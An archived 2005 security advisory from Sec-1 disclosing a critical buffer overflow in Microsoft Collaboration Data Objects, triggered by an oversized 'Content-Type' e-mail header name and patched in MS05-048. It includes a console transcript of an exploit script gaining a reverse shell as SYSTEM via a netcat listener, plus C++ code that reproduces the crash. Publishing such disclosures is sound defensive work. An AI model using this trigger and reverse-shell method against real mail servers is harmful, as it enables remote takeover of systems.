what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

sec-1-Collarboration.txt

sec-1-Collarboration.txt
Posted Oct 15, 2005
Authored by Gary O'Leary-Steele | Site sec-1.com

Sec-1 has identified an exploitable buffer overflow within Collaboration Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when event sinks are used within Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail content. Several Content Security packages were identified to be vulnerable/exploitable.

tags | advisory, overflow
advisories | CVE-2005-1987
SHA-256 | 9f4f941c51cdd9e0d26f660aabaaad96258464fb7cea45f0278841f2584003a0

sec-1-Collarboration.txt

Change Mirror Download
                                SEC-1 LTD.
www.sec-1.com

Security Advisory

Advisory Name: Collaboration Data Objects Buffer Overflow Vulnerability
Application: Multiple Applications that implement CDO
Platform: Windows 2000 (All versions)
Windows XP (All versions inc sp2)
Windows Server 2003 (All versions)
Exchange 2000 Server Service Post-Service pack 3

Severity: Critical. Remote Code Execution
Author: Gary O'leary-Steele
Vendor Status: Patch Released
CVE Candidate: CAN-2005-1987
Reference: http://www.sec-1.com
Disclosed: 12/October/2005


Vulnerability Details:

Sec-1 has identified an exploitable Buffer Overflow within Collaboration
Data Objects (Cdosys.dll and Cdoex.dll). The vulnerability exists when
event sinks are used within Microsoft Exchange 2000 or Microsoft Mail
services to parse e-mail content. Several Content Security packages
were identified to be vulnerable/exploitable.

The vulnerability can be exploited by crafting an e-mail with a large
header name such as "Content-Type<LARGE STRING>:".
A failure to correctly determine the length of the string results in a
stack overflow. Successful exploitation of the vulnerability could allow
the attacker to gain complete control of the vulnerable host. Under
certain conditions the vulnerability can also be used to bypass content
security mechanisms such as virus and content security scanners. Proof
of
concept code to recreate the problem is included at the bottom of this
advisory.


Exploit Availability:

Sec-1 do not release exploit code to the general public.
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal.
See: http://www.sec-1.com/applied_hacking_course.html


Exploit Example:

[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53

Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80

[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.

[!] Note this may take a while. Inetinfo will crash and restart
This will happen until a nops are reached. You may also want
to clear the queue to restore Inetinfo.exe by deleting malformed

e-mail from c:\Inetpub\mailroot\Queue

[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...

10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.


C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>


Vendor Response:

Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

CAN-2005-1987


Demonstration:

The following CDO code demonstrates the problem.

Step 1.

Create an E-mail named vuln.eml including a large "Content-Type:"
header.

Step 2.

// Compile with -GX option
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

#include <stdio.h>

int main()
{

CoInitialize(0);
try
{
CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
_StreamPtr spStream(spMsg->GetStream());
spStream->Position = 0;
spStream->Type = adTypeBinary;
spStream->LoadFromFile("vuln.eml");
spStream->Flush();

for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
{
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
}

}
catch(_com_error &e)
{
printf("COM error[0x%X, %s]\n", e.Error(),
(LPCTSTR)e.Description());
}
catch(...)
{
printf("General exception\n");
}

CoUninitialize();

return 0;
}

CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
_variant_t v =
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;


Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security
to further your knowledge and protect your network
http://www.sec-1.com/applied_hacking_course.html
**************************************************************


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close